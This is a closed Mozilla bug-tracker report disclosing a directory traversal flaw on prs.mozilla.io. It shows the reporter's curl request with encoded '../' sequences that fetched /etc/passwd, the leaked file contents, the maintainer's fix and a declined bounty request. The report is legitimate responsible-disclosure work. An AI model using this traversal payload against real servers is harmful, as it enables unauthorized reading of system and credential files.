Closed Bug 1264539 Opened 9 years ago Closed 9 years ago

Directory Traversal on prs.mozilla.io

Categories

(Websites :: Other, defect)

Product:
Websites
Component:
Other
Version:
Production
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: griffin.francis.1993, Assigned: peterbe)

Details

(Keywords: reporter-external, sec-high, wsec-fileinclusion)

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 Steps to reproduce: curl -i -s -k -X 'GET' \ -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' \ 'http://prs.mozilla.io/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' Actual results: We are able to read files from the webserver. Output returned from /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh u54795:x:54795:54795:,,,:/app:/bin/bash dyno:x:54795:54795:,,,:/app:/bin/bash Expected results: Code should be sanitised to protect against Local File Inclusion attacks.
:peterbe -- do you know where the best place to send this? The project is housed in your repo, so I'm assigning you unless you happen to know where it should go instead. Thanks!
Assignee: nobody → peterbe
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-high, wsec-fileinclusion
https://github.com/peterbe/github-pr-triage/blob/master/app.py#L190 Is the offending code. That's a pretty rough mistake; you should never traverse outside of the root directory.
Peter: Would you be able to assist us with obtaining a fix for this security issue?
Status: NEW → ASSIGNED
haha! Goes to show how much Flask I know :) The site is a personal site-project but it's hosted on a Mozilla Heroku account.
Summary: Local File Inclusion on prs.mozilla.io → Directory Traversal on prs.mozilla.io
Fixed. However, now that I try to curl `http://prs.mozilla.io` it tries to redirect to `https://prs.mozilla.io` which is not something that's set up. I wonder where that came from.
Status: ASSIGNED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Yeah, I just noticed the same thing... $ curl -i -s -k -X 'GET' -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' 'http://prs.mozilla.io/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' HTTP/1.1 301 MOVED PERMANENTLY Connection: keep-alive Server: gunicorn/19.4.5 Date: Thu, 21 Apr 2016 19:51:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 369 Location: https://prs.mozilla.io/../../../../../../../../../../../../../../../../etc/passwd Via: 1.1 vegur Looks like heroku has the SSL cert provisioned for you, but it's not set for your domain.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Two ideas: 1.) It's related to the rev'ing of your deps? 2.) It's something in heroku that says do HTTPS only now, so it's redirecting for you?
Not sure about reopening this. The SSL problem is something else. The security thing is fixed and I was able to reproduce it locally and fix it there. If you take the same curl line but replace the domain with enigmatic-beyond-2991.herokuapp.com it now yields a 404 error instead.
Peter: alright, I'll resolve then. As far as I'm concerned the directory traversal is sorted.
Status: REOPENED → RESOLVED
Closed: 9 years ago9 years ago
Resolution: --- → FIXED
Flags: sec-bounty?
Griffin: This site is not enrolled in the bug bounty. We're in the process of updating the list to include some new sites soon, but this site is not slated to be added in the upcoming update. Eligible sites can be found here => https://www.mozilla.org/en-US/security/bug-bounty/faq-webapp/#eligible-bugs. Thank you for reporting this.
Flags: sec-bounty? → sec-bounty-
Hi Jonathon. Thanks for the response. Any chance I could have this raised for consideration by the panel due to the severity of the issue at hand?
Flags: sec-bounty- → sec-bounty?
Thanks Jonathan much appreciated! :)
This site is out of scope for the bounty program on bounty committee review and this isn't so severe of an issue that we will give a bounty for it even though it is out of scope. Thank you for reporting it to us.
Flags: sec-bounty? → sec-bounty-
Group: websites-security
You need to log in before you can comment on or make changes to this bug.